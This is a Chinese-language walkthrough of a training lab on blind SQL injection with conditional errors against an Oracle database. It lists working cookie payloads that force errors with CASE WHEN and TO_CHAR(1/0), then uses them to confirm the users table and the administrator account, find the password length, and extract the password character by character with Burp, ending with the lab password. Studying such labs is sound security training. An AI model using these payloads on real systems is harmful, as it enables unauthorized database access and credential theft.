Lab12_ Blind SQL injection with conditional errors

前言：

实验室标题为：

利用条件错误进行 SQL 盲注

等级：执业者

简介：

本实验室包含一个盲 SQL 注入漏洞。应用程序使用跟踪 cookie 进行分析，并执行包含已提交 cookie 值的 SQL 查询。

SQL 查询的结果不会返回，应用程序也不会根据查询是否返回任何记录做出任何不同的响应。如果 SQL 查询导致错误，应用程序会返回一条自定义错误消息。

数据库包含一个名为users的不同表，其中有名为username和password的列。您需要利用 SQL 盲注漏洞找出管理员用户的密码。

要解决实验问题，请以管理员用户身份登录。

提示：本实验室使用的是 Oracle 数据库

进入实验室

可以看到，依旧是一个商店页面

构造 payload

和上一关一样，依旧是借助插件 EditThisCookie

输入单引号，刷新页面

页面显示报错，500 服务器内部错误

输入单引号+注释符，刷新页面

页面显示正常，报错消失

构造子查询，通过子查询判断报错是 SQL 语法报错，而不是其它类型的报错

'||(select '' from dual)||'

页面显示正常

继续构建一个无效的子查询

'||(select '' from aaaa)||'

页面报错

可以确认，后端将注入语句当作 SQL 查询处理

只要确保注入语法有效的 SQL 查询，就可以通告报错来推断数据库的关键信息

验证是否存在 users 表

' ||(select '' from users where rownum=1)||'

页面返回正常，表示存在 users 表

根据实验室提供的 SQL 注入小抄

SELECT 
    CASE 
        WHEN (your-condition-here) 
        THEN TO_CHAR(1/0)  -- 条件成立时执行
        ELSE NULL          -- 条件不成立时返回NULL
    END 
FROM DUAL;

修改 payload 为：

'||(select case when (1=1) then to_char(1/0) else '' end from dual)||'

刷新页面，显示报错信息

将 SQL 语句中的判断条件 1=1 改为 1=2

'||(select case when (1=2) then to_char(1/0) else '' end from dual)||'

页面返回正常

因此可以通过设置 SQL 语句中的条件为 1=1 ，使页面报错来推断数据库的关键信息

查询用户名 administrator 是否存在

'||(select case when (1=1) then to_char(1/0) else '' end from users where username='administrator')||'

页面报错，说明存在administrator 用户

继续判断管理员用户密码的字符数

'||(select case when length(password)>1 then to_char(1/0) else '' end from users where username='administrator')||'

通过页面报错来判断密码字符数，当页面不再显示报错时，密码的长度也就确定了

通过判断密码字符为 20 位

接着推断密码的具体值

'||(select case when substr(password,1,1)='a' then to_char(1/0) else '' end from users where username='administrator')||'

通过 burp 来爆破数据

在 SQL 语句中，条件为真时，页面显示 500 报错，因此可以通告 HTTP 状态码来判断

根据爆破结果，得到密码的具体值

ynhpdsfe6fkf9tdbd5nj

登录 administrator 账户，成功通关